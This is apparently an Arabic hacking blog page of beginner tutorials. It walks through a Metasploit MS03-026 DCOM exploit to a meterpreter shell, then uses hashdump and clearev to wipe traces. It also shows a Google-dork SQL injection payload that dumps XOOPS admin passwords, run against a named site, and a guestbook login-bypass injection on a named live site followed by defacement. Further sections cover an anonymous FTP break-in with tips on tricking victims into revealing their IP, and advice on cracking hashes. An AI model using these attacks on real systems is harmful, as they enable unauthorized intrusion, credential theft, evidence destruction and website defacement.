شرح تطبيقي لكيفية استخدام مشروع الميتاسبلويت


نـــبدأ على بـــركة الله

.::: ســيناريو الهجــوم :::.
.::: جـــهاز الضحية :::.

نـظام الـتشغيل : Microsoft Windows Server 2003 .
إيـبـي الضحية : 192.168.42.129 .

.::: جــهاز المهاجم :::.

نـظام الـتشغيل : BackTrack 5 .
نسخة الميتاسبلويت : metasploit 3.8.0 – dev / release

إيـبـي الجهاز : 192.168.42.128 .

.::: مــاهو هـد فـنـا :::.
المعلومة الوحيدة المتوفرة لدينا عن جهاز الضحية هي أن جهازه هو Microsoft Windows Server 2003 و الهدف هو الحصول على الشيل أكسيس بتاع جهاز الضحية .

.::: تــفاصيل الهــــجوم :::.

المرحلة الأولى :
عــمل فـحص إيــبـي الضــحبة 192.168.42.129 عن طريق برنــامج Nmap.
بــعد إكتــمال الفحص تـظهر لنا المـنافذ المفتوحة في جـهاز الـضحية كما في الصورة .




كـما نلاحظ أ ن البورت 135 مــفتوح والذي يدعم خدمة RPC , إذا سوف نقوم بالبحث عن سكريبت في الميتاسبلويت من أجل إستغلال هذه الخدمة , والحصول على الشيل في حالة إذا كان جهاز الضحية مصاب بهذه الثغرة .

المرحلة الثانــية :

عن طريق BackTrack , إذهب إلى :
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole .


أثناء تشغيل msfconsole , تحقق من أن كل شيء تمام , بعد ذالك ستظهر نافذة ال msfconsole كما في الصورة .



المرحلة الثالــثة : 
الأن نحن نعرف أن البورت 135 مفتوح , إذا سوف نقوم بالبحث عن استغلال لل RPC في الميتاسبلويت .
ملاحظة
من أجل استعراض جميع الاستغلالات في الميتاسبلويت , نقوم بتنفيد الامر « show exploits » , وكما نرى في الصورة هذه بعض الاستغلالات في الميتاسبلويت .



إذا الان في واجهة msfconsole نقوم بتنفيد الامر " search dcerpc " من أجل البحث عن جميع الاستغلالات المتعلقة ب dcerpc التي من خلالها يمكننا الحصول على الشيل أكسيس لجهاز الضحية عن طريق البورت 135 .



المرحلة الرابعـــة :

و الأن بعدما حصلنا على جميع الاستغلالات المتعلقة ب RPC , نحتاج إلى المزيد من المعلومات عن هذه الاستغلالات قبل استخدامها .

للحصول على المزيد من المعلومات التي تتعلق بالاستغلال نستخدم الأمر
" info exploit_name " والذي يعرض لنا معلومات مهمة كــ : الأهداف المتاحة , شروط الاستغلال , وتفاصيل أكثر عن الثغرة ....

و في حالتنا سنستخدم الأمر " exploit/windows/dcerpc/ms03_026_dcom info " حيثexploit/windows/dcerpc/ms03_026_dcom هو إسم الاستغلال الذي سنستخدمه .


المرحلة الخامسـة :
و الأن بعد ماعرفنا ما يلزمنا من أجل الإستغلال , سوف نقوم بتنفيذ الأمر "use exploit_name" من أجل تجهيز بيئة عمل هذا الاستغلال و الذي سنستخدمه في اختبار الإختراق J
و في حالتنا سنستخدم الأمر " exploit/windows/dcerpc/ms03_026_dcom use " من أجل تجهيز الاستغلال .


من خلال الشكل السابق , نلاحظ أنه بعد استخدامنا الإستغلال "exploit/windows/dcerpc/ms03_026_dcom " , تغير شكل ( Prompt ) من " < msf " إلى <(msf exploit (ms03_026_dcom" والذي يعني أننا دخلنا مؤقتا إلى بيئة عمل الإستغلال .

المرحلة السادسـة :

والان , سوف نقوم بالتعديل على إستغلالنا حسب ما يحتاج إليه هجومنا . إذا سوف ننفذ الأمر " show options " من أجل إستعراض مختلف البارمترات التي يتطلبها الاستغلال للعمل بشكل جيد .
في حالة هجومنا :
الخيار RPORT ( بورت الضحية ) موضوع فيه مسبقا 135 , إذا الخيار الوحيد الذي سوف نقوم بالتعديل عليه هو RHOST ( إيــبـي الضحية ) , عن طريق الأمر " set RHOST" , في حالتنا سنستخدم الأمر "set RHOST 192.168.42.129"
وكما نلاحظ في الصورة تم تهيئة المتغيرRHOST إلى 192.168.42.129


المرحلة السابعـة :
إذا المرحلة الأخيرة قبل تنفيذ الاستغلال هي تعديل البايلود الخاص بنا من أجل الاستغلال .
نستطيع مشاهدة جميع البايلود عن طريق الأمر "show payloads" .
والصورة توضح جميع البايلود المتوافقة مع الاستغلال الذي إختارناه .


في حالتنا سوف نستخدم البايلود الشهير " reverse tcp metetpreter" وذالك باستخدام الأمر
"windows/meterpreter /reverse_tcp set PAYLOAD"
من أجل الحصول على الشيل إذا تم استغلال النظام بنجاح .


المرحلة الثامنـة :
والأن لم يبقى سوى رؤية البارمترات المتاحة مجددا عن طريق الأمر " show options " للتأكد من أن كل الخيارات تم تهيئتها جيدا من أجل تنفيذ الإستغلال بشكل جيد .


نلاحظ في الشكل السابق أن الخيار LHOST ( إيــبـي جهازنا ) بتاع البايلود لم يتم تهيئته , إذا سوف نقوم بتهيئته بــ :92.168.42.128 بإستخدام الأمر "set LHOST 192.168.42.128" .


المرحلة التاسعـة :
والان كل شيء تمام والاستغلال تم تعديله بشكل جيد , الان حان وقت تنفيذ الاستغلال ( أرى أن الكل ينتظر ماذا سيقع J )
أه نسيت , قبل تنفيذ الاستغلال سوف نستخدم أحد أهم الأوامر في الميتاسبلويت وهو الأمر " check ".

------------------------------ ملاحظة ---------------------------
بالنسبة للأمر " check " فهو يستخدم للتحقق من أن جهاز الضحية قابل للاستغلال من هجومنا أو لا .
هذا الأمر أو الخيار غير موجود في جميع الاستغلالات , وفائدته كما قلت سابقا يتيح لنا فرصة التأكد من أن جهاز الضحية مرقع أو لا من الثغرة .


كما تلاحظون في الصورة فهذا الاستغلال لا يدعم الخيار " check ".
----------------------------------------------------------------------------------------
لم يبقى الآن سوى تنفيذ الاستغلال عن طريق الأمر " exploit"


من الشكل السابق نلاحظ أن الاستغلال قد تم تنفيذه بنجاح على جهاز الضحية وتم اختراقه , والدليل على ذالك هو تغير شكل ( Prompt ) إلى meterpreter >

المرحلة العاشرة و الأخيرة :
والأن بعد أن تم الاختراق وعمل اتصال بين جهاز الضحية و جهازنا عن طريق "meterpreter" , أصبح عندنا كامل التحكم في جهاز الضحية .
والان بإمكاننا استخدام الأمر "Help " لمعرفة الأوامر الممكن تنفيذها على جهاز الضحية .
والصورة تظهر بعض الأوامر التي استخدمتها لتنفذ على جهاز الضحية :


شرح الأوامر التي تظهر في الصورة :
ipconfig : هذا الأمر يظهر جميع عناوين TCP/ IP الحالية في جهاز الضحية.
getuid : هذا الأمر يظهر إسم مستخدم النظام بتاع الضحية.
Hashdump: هذا الأمر يستخرج أسماء المستخدمين و كلمات مرورهم.
Clearev: يستعمل هذا الأمر من أجل مسح كل الآثار التي تركناها على جهاز الضحية.
فعلتها أخيرا 
Read more

الـ [ M e t a S p l o i t ] لمحآت و توضيحآت


عندما أتحدث عن أداة الاختراق الاحترافية أول مايتبادر إلى الذهن هو مشروع لغة البرمجة روبي والذي يحتوي على أكثر من 700.000 سطر أكيد عرفتوه انه مشروع الميتاسبلويت (-:

نـبذ ة عن مشروع الميتاسبلويت
منصة الميتاسبلويت هو عبارة عن برنامج مطور من طرف .Metasploit LLC بداية تطوريره كان عام 2003 بواسطة لغة البرمجة بيرل عن طريق الهاكر المـبـجل HD Moor ,لاكن في الاونة الاخيرة تم إعادة برمجته بواسطة لغة البرمجة روبي .
المراحل المتبعة من طرف الميتاسبلويت لاختراق نظام معين :
1 : تحديد الهدف أو النظام .
2 : اختيار و تعديل الاستغلال المناسب من أجل استهداف النظام .
3 : اختيار و تعديل البايلود المناسب الذي سيشتغل على جهاز الهدف .
4 : اختيار نوع التشفير من أجل تخطي نظام كشف الاختراق .
5 : تنفيذ الهجوم أو الاستغلال .
الاوامر المستخدمة في الميتاسبلويت :
show exploits :
هذا الأمر يقوم بإظهار جميع الاستغلال المتوفرة في مشروع الميتاسبلويت لجميع الأنظمة و التطبيقات : ( ويندوز – لينكس – الماك - أباتشي .... ) .
use < exploit_name > :
هذا الأمر يخبر الميتاسبلويت بأننا سنستخدم هذا الاستغلال .
show payloads :
هذا الأمر يقوم بإظهار جميع البايلود الممكن تنفيدها .
set payload < payload_name > :
هذا الامر مهمته وضع البايلود الذي سينفد عند نجاح الاستغلال .
show options :
هذا الامر يظهر لك جميع الخيارات الممكنة التي ستقوم بتعبئتها من أجل نجاح الاستغلال .
================================================== =========
ملاحظة :
بالنسبة للأمرshow options يتم استعماله عند اختيار الاستغلال المناسب و كذلك عند اختيار البايلود .
================================================== =========
set RHOST < hostname_or_ip > :
هذا الأمر من أجل تحديد إيبي جهاز الهدف .
set RPORT < host_port > :
هذا الأمر من أجل تحديد بورت جهاز الهدف ( هذا البورت يتم تحديده غالبا من طرف الميتاسبلويت ) .
Help :
هذا الامر مهمته اظهار جميع الاوامر التي لم نتطرق لها .
================================================== ===========
.إلى هنا أكون قد إنتهيت من هذه المقدمة الطويلة عن مشروع الميتاسبلويت

Read more

اختراق الموقع عبر الثغرات-شرح استخدام الثغرات



نروح الى احد مواقع الثغرات الكثيره
وانا اخترت الميل ورم لانه اسهل واحد
نفتح الصفحة الرئيسيه للموقع
milw0rm - exploits : vulnerabilities : videos : papers : shellcode
الي يهمنا في هذي الصفحة هو اختراق المواقع بما ان حنى مبتدئين
الا هي
ثالث خيار

الي لونهم بـ الاصفر
هذول جدد بـ تاريخ اليوم
والي لونهم اخضر يعني اقدم
وطبعا التاريخ مكتوب على جنب
انا بختار وحدة من الثغرات الموجوده
و اخترت هذي الثغره
XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability
مكتوب فيها كـ التالي
كود:

##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME :*milw0rm - S@BUN
#
####MAİL :*hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-17]

طيب نشرح شوي شوي
الجزاء الاول


كود:

XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection


هذي معلومات عن الثغره
نوعيتها و وين الثغره موجوده و في اي اصدار
طيب
الثغره هذي في سكريبت اسمه XOOPS
وهذي مجله طبعا
على اية حال الثغره في dictionary
الا هو الدليل
والاصدارات هي
0.94-0.91-0.70
والبيانات الي بتجي هذي غير مهمه بـ النسبه لنا
وهي معلومات عن مكتشف الثغره

كود:

#
##AUTHOR : S@BUN
#
####HOME :*milw0rm - S@BUN
#
####MAİL :*hackturkiye.hackturkiye@gmail.com
#

###########################################
والان اهم جزئين
الجزاء الاول الدورك

###########################################
كود:

#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#

شنو هذا الدورك
هذي الكلمه الي راح تحطها في كلمة البحث عشان تجيب لك المواقع المصابه بـ الثغره
فـ لو كتبت في قوقل

كود:

allinurl: "modules/dictionary"

راح يطلع لك كل المواقع الي موجود فيها هذا
على اية حال
نختار موقع من المواقع
وانا اخترت

كود:

Southwestern Pennsylvania League of Apparition Technologists - Dictionary

نروح الى الجزاء الثاني المهم
الا وهو

كود:

###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################

وهذا كود الإستغلال
يعني راح ننسخ هذا الكود ونحطه في الموقع الي اخترناه
وراح يصير رابط الموقع مع الاستغلال كذا
كود:

Southwestern Pennsylvania League of Apparition Technologists*

/*
فورا راح يطلع لنا اليوزر والباسوورد لمدير الموقع
طبعا الموضوع ما ينتهي هنا
الباسوورد مشفر بـ الـ MD5
والـ MD5 هذا نوع من انوع التشفير وهو نوعا ما
لكن البرامج ما قصرت و تقدرو بـ اي برنامج فك باسووردات MD5 انكم تفكو الهاش الي يطلع لكم
على اية حال الان الباسوورد طلع لنا مشفر مع الاسم
يعني الباسوورد مشفر والاسم موجود جنبه
وهم كذا
ARC-753: a19010808cc277ac5cc50548d7a61e8e
الي بـ الون الاحمر هذا الباسوورد المشفر
والي بـ الازرق هذا اسم مدير الموقع الي راح تدخل به لوحة التحكم بعد ما تفك التشفير
النقطتين الرئسيتين فقط لتفريق بينهم
بعد ما تفك باسوورد الموقع
تدخل لوحة تحكم الموقع وتسوي الي يعجبك
ملاحظة: موقع الثغرات اللي إستعملناه للأسف مغلق.. لكن هناك العديد من المواقع الأخرى
Read more

شرح إستخدام ثغرة سهلة جدا لإختراق المواقع


ادخل الى محرك البحث

www.googel.com

اكتب فى خانة البحث 

powered by guestbook 2.2

طلعت لنا المواقع ناخد منها واحد على سبيل المثال

www.hegemonconcepts.com

نكتب بجانب الموقع هذة الكلمة

guestbook/admin.php

ليصبح كالتالى 
www.hegemonconcepts.com/guestbook/admin.php

و دلوقتى بيطلب منك اليوزر نيم و الباسورد 

دع خانة اليوزر نيم فارغة وكل ما عليك ان تضع

هذا الكود بداخل خانة الباسورد

وهذا هو الكود 

') OR ('a' = 'a

انتظر شوية...........
الان انت فى لوحة التحكم على الإختراق

و دى الخطوة الاولى انت عملتها بنجاح 

دلوقتى هتلاقى قدامك الاتى

Private Messages | Password | General Settings | Style | Templates | Smilies | Password | Logout
اول شىء غير الباسورد

اضغط على | Password | 


كدة كل شىء فى التمام
اكيد طبعا عاوز تحط بصمتك فى الموقع اعمل الاتى
| Easy Admin | اضغك على


اضغط على كلمة edit 

و ممكن ان ضف كود الاندكس الخاص بك 
ولكن قم بتفعيل كود HTMLمن SETTING قبلها


و يارب اكون وفقت فى شرح الثغرة و تكونو فهمتوها 
سلام
Read more

طريقه اختراق الكمبيوتر عن طريق cmd للمبتديئين


كيفيه اختراق الكمبيوتر عن طريق CMD
ازاى و يا ترى ايه هو CMD ???
بنسميه الدوس هو عباره عن موجه اوامر خططى لنظام OS و هو الذى تمت صناعته من قبل شركتين معاً و هما مايكروسوفت و شركه اى بى ام
و نحن نقوم باستخدام البرنامج في تنفيذ بعض الاوامر مثل النسخ - تهيئة الاقراص - الحذف - ارسال اشارة للسيرفر - استعراض الملفات و غيرها من الامور .
المهم ندخل فى الموضوع
ازاى نخترق الجهاز عن طريق الدوس او command prompt(CMD)
أ- الادوات المطلوبه
1-اي بى الضحيه :
ما هو الاي بى ؟؟ الاي بي هو عنوان الكمبيوتر على الانترنت و مستحيل تلاقى جهازين بنفس الاي بى و من غيره متعرفش تخترق الجهاز الا عن طريق التروجان و برامج الاختراق
و خليني ابسطلكم المعنى اكتر الاى بي زى عنوان شفتك و بيكون منقسم لاربع اقسام
مثال مكان فى مصر .محافظه الاسكندريه شارع فؤاد . رقم البيت
كود PHP:
62.12.96.0/19
62.68.224.0/19
62.114.0.0/16
62.117.32.0/19
62.135.0.0/17
62.139.0.0/16
62.140.64.0/18
62.193.64.0/18
62.240.96.0/19
62.241.128.0/19
80.75.160.0/19
80.95.0.0/20
81.4.0.0/18
81.10.0.0/17
81.21.96.0/20
81.29.96.0/20
82.129.128.0/17
82.201.128.0/17
84.36.0.0/16
84.205.96.0/19
84.233.0.0/17
192.101.142.0/24
193.227.0.0/18
194.79.96.0/19
195.234.185.0/24
195.234.252.0/22
195.246.32.0/19
196.2.192.0/18
196.20.32.0/19
196.22.5.0/24
196.46.188.0/22
196.201.3.0/24
196.201.24.0/21
196.201.240.0/21
196.202.0.0/17
196.204.0.0/15
196.218.0.0/15
212.12.224.0/19
212.50.96.0/19
212.103.160.0/19
212.122.224.0/19
213.131.64.0/19
213.152.64.0/19
213.154.32.0/19
213.158.160.0/19
213.181.224.0/19
213.212.192.0/18
213.247.0.0/19
213.255.128.0/19
217.20.224.0/20
217.29.128.0/20
217.52.0.0/14
217.139.0.0/16 
لاحظوا من 62 الى 217
ده مصر
و طبعاً الارقام اللى بتبقى فى اخر بوينت اللى هى صفر دي مش ثابته يعنى بتختلف من جهاز لجهاز
حتقولولي و ده نجيبه من الضحيه ازاى ان شاء الله ؟؟
حقولكم سهله جدااااً
ابعتله (صوره - اغنيه - ملف وورد- دعوه مايك او كاميرا - الخ ...)
بعد ما يقبل منك اى حاجه من المذكورين بسرعه تعمل الاتى :
1- اضغط على اسارت
2- run
3- اكتب CMD
بكده تبقى ظهرتلك صفحه الدوس و تكتب فيها الامر ده netstat -n

حيظهرلك قائمتين فيهم اى بيهات الصف الشمال اى بى واحد زى بعض يعنى و ده الاى بى الخاص بجهازك انت
الصف التانى اى بيهات مختلفه اى بى الضحيه الى انت بعتلو الملف ده و قبل منك اخر واحد الاى بى للضحيه هيكون اخر اى بى على الصف الايمن
او تالت اى بى على الصف اليمين
المهم كده احنا جيبنا الاى بي
بعد كده علشان نقدر نخرق الجهاز لازم البورت رقم 21 يكون مفتوح
و هو البورت الخاص بـ FTP
و علشان تتأكد من ان البورت مفتوح فى برامح كويسه بتعهرفلك كل ده و منا اهمها Superscanne
المهم بعد ما اتأكدنا ان البورت مفتوح ندخل Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
اكتب open 00.00.00.00
طبعاً مكان الاصفار بنحط رقم الاي بي
اذا جالك الرد ده Connected to http:
220 websrv1 Microsoft FTP Service (Version 4.0
اكتب quote user ftp
حيجيلك الرد ده Anonymous acces allowed, send identify (e-mail name) as password
اكتبquote cwd ~root
اذا جالك الرد ده 530 Please login with USER and PASS
اكتبله quote pass ftp
اذا جابلك الرد ده يبقى احنا كده اخترقنا الجهاز
و بكده نكون وصلنا لنهايه الدرس علشان تعرف من تنقل اي حاجه من جهاز الضحيه لازم تكون متمكن من الدوس
و هناك المزيد... إنتظرونا
Read more

معلومات عن اختراق المواقع


س1 : ‏ما هو الـURL ؟؟

"Uniform Resource Locator" رمز عنوان الموقع

الي هو هذا httl:\\www.???.com

=================
س2 : ما هو الدومين نيم (Doumin name)؟.؟
الدومين نيم أو إسم الملكيه أو إسم النطاق .....

*هو إسم تملكه كبطاقة تعريف مثلا تعرف المتصفحين على عنوانك لكي يذهبوا لك ويتصفحوا موقعك

*عندما تسجل اسم دومين فذلك يعني أنه اصبح لك عنوان "موقع يعني" على الإنترنت مثلا
www.???.com

=================
س3 : طيب وين أسجل إسم دومين ؟؟
يتم التسجيل والحجز في المواقع الخاصة بالإستضافة على النت

=================
س4 : ما هي الإستضافة ؟
الإستضافة أو تسكين موقع تعني حجز مساحة على جهاز أو سيرفر مزود هذه الخدمة وذلك لإستخدامها في
إنشاء وتحميل صفحات موقعك وذلك بتسمية هذه المساحة على إسم الدومين نيم الذي تملكه مثل إنشائك
لمجلد في كمبيوترك وتعطيه إسم معين لتخزن فيه ملفات من نوع ما .
=================

س5 : أنا ابغى أسمي موقعي كذا www.???.net أقدر ؟؟؟
أكيد بس المتعارف علية كالتالي:
com
تعني كوميرشال أو تجاري أي لأغراض شخصية أو تجاريةأي يمكن الإستفادة منها بتقديم خدمات وبيع وشراء
net
‏ تعني network أو شبكة وتستخدم عادة لتزويد خدمات أو إستضافة
‏org
تعني أورغانايزيشن أي منظمة أو هيئه حكومية وهي مخصصة للأغراض الغير ربحية
‏edu
تعني إديوكيشن أي هيئه علميه أو تعليميه وهي مخصصه لهذا الغرض مثل الجامعات والمراكز العلميه
xx
حرفين يرمزان لدولة معينة يعني مثلاً sa تعني sudia arabia

وإختار إلي يناسبك...
=================

س7 : ما هو الـ FTP ؟؟؟
File Transfer Protocol

وسيلة تناقل الملفات ويستخدم بها برامج لهذا الغرض حيث يمكنك عن طريقها تحميل ملفاتك وصفحاتك
الى مساحتك المخصصة على السيرفر
وهي إتصال مباشر بالسيرفر وهناك طريقتان للدخول على السيرفر , إما عن طريق الرقم والمعرف
المزودان لك من قبل الشركة أو يمكنك أن تدخل كضيف على إحدى السيرفرات لفرع مخصص لذلك

=================

س8 : كيف أدخل للftp ؟

يتم الدخول للftp بأجد برامج الFTP أو ممكن أيضاً من المتصفح كالتالي:
ftp.maas1.com
ثم تكتب إسم المعرف وباسورد الدخول

=================
س9 : أين يتم وضع ملفات الموقع ؟

بعد الدخول الى حسابك من خلال الـ اف تي بي FTP تقوم بالدخول الى مجلد اسمه public_html ومن
خلال الدخول الى هذا المجلد يمكن وضع جميع الملفات الخاصة بك
ويجب تسمية الملف الأساسي index.html or index.htm or default.html or default.htm وممكن تكون
بإمتدادات أخرى حسب نوع برنامج النظام الموجود في السيرفر

=================

س10 : ماذا يعني تراسل البيانات في الـ Traffic ؟

Traffic يعني حركة المرور للبيانات
وتعني كم من البيانات يمكنك أن ترسل من خلال الإتصال بالمتصفحين وتحسب شهريا . ولكل خطة إستضافة
حجم معين مجاني ويتجدد في بداية كل شهر . وتحسب بالبايت
1KB = 1024 bytes .. 1 MB = 1048,576 bytes

=================

س11 : ماهو الbandwidth ؟

هو الذي يتحكم في كمية البيانات التي تتنتقل من والى الموقع وهذي هي وظيفته الوحيدة وتكمن
فائدته بالنسبة لصاحب الموقع فقط حتى يعرف كم حجم الـ Traffic المنتقل من البيانات من والى الموقع

لانه سيكون محدود بكمية محددة من البيانات مثل كثرة تحميل البرامج للموقع وكذلك مراسلة الاعضاء
وكل هذه تأثر على الباندويث المحدد لكل موقع

وهي عبارة عن عدة الوان
الابيض ومعناه ان الموقع ما زال في السليم ولم يتجاوز المقدار المحدد له
والبرتقالي اقل من 10 جيجا
والاحمر قد تجاوز 10 جيجا

=================

س12: ‏ما هو الـCGI

Common Gateway Interface أو البوابة البينية المشتركة
وهي مجموعة من القوانين تحكم عمل السيرفر مع برنامج السي جي اي لتنفيذ
أمر ما يطلبه المتصفح وتتطلب مدخلات لكي تزود المعلومات المطلوبة وهي كثيرة
وبرامج الCGI تكون مكتوب بلغة أشرها لغة بريل وسي
=================


س13 : اين اضع البرامج المعروفة بالسي جي اي CGI

بعد الدخول الى حسابك من خلال الـ اف تي بي FTP تقوم بالدخول الى مجلد اسمه public_html سوف
تجد مجلد بهذا الاسم cgi-bin ومن خلال الدخول الى هذا المجلد يمكن وضع اي برامج يتعلق بالسي جي

ويتم تنفيذ برامج او سكريبتات cgi من المتصفح

=================

س14 : ‏ما هو الـUNIX ؟؟؟

هو نظام تشغيلي للسيرفر ومعظم سيرفرات الإنترنت تعمل على هذا النظام مثل نظام الدوس والويندوز
بجهازك

وهناك أنظمة تشغيل كثيرة تستخدمها السيرفرات
=================

*لمعرفة نظام تشغيل سيرفر أي موقع:

http://www.netcraft.com
http://www.dns411.com

******************
س15 : كيف اعرف الموقع هذا تبع اي دولة؟

روح للموقع هذا http://www.dns411.com/
اكتب الموقع
واضغط WHOIS

=================

س16 : ماهي الثغرات ؟

الثغرات ضعف أمني يساعدك في دخول نظام معين وإختراقة وقد تكون أيضاً الطريقة المساعدة
لتحويلك من user إلى Administrator وبذالك تستطيع التحكم بالسيرفر
أغلب الثغرات تكتب بلغة C وتحتاج Compiler مترجم

=================

س17 :ماهوالهدف من الثغرات ؟؟

تتلخص فكرة كل الثغرات في الحصول على ملف الباسورد

=================

س18 :بعد الحصول على ملف الباسورد وش أسوي ؟
أكيد الباسورد داخل الملف مشفر بإحدى انواع التشفير

أغلبها:
DESويتم فك تشفيرة ببرنامح جون ذا ربير البرنامج ممتاز وسهل ,
وانشالله يتم شرحه بأقرب وقت..md5 وممكن برنامج جون يفك التشفير بس يطول وفي برامج أخرى مثل برنامج md5cracker

وهذا برنامج جميل
http://www.freeware.de/software/Pro...T_EN_10164.html

وهذا كود بال php لفك الشفرة ايضا
http://www.securiteam.com/tools/5XP0X0040G.html


وبعدين إدخل على ftp وإكتب الاسم والباسورد الي فكيته
أو إدخل على لوحة التحكم الخاصة بالمنتدى
مثل كذا www.***.com\cpnel
وإكنب الاسم والباسورد وإبدأ إبداعاتك في الموقع

=================
س19 : كيف أبحث عن ثغرات للمواقع ؟؟

نحنا نبحث عن حاجة إسمها ال exploit أو Valnerableties يعني ثغرات
روح لأي موقع بحث
ثم إكتب كذا exploit+"إسم الثغرة المطلوبة"
=================

س20 : من فين أحصل على الثغرات ؟

من مواقع السكورتي توجد ثغرات كثير ويمكنك الإشتراك في قوائمهم البريدية لتزويدك بالجديد
منها موقع :
http://www.securityfocus.com/

=======================


ممكن بعض الروابط لا تعمل
لان مهما كان هذه معلومات عامه
وبسيطه لإختــراق المواقع
Read more